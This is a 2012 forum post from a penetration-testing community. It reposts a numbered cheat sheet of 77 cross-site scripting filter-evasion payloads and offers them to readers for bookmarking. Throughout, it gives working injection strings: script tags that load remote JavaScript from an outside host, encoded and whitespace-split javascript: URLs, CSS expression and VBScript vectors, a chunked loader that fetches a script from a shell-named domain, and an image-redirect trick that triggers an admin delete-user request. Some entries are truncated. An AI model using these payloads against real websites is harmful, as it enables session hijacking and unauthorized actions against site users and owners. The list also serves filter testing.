China Network Penetration Testing Alliance

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
It seems t00ls has rather little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (use the calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (use the calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (use the calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (use the calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting up the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2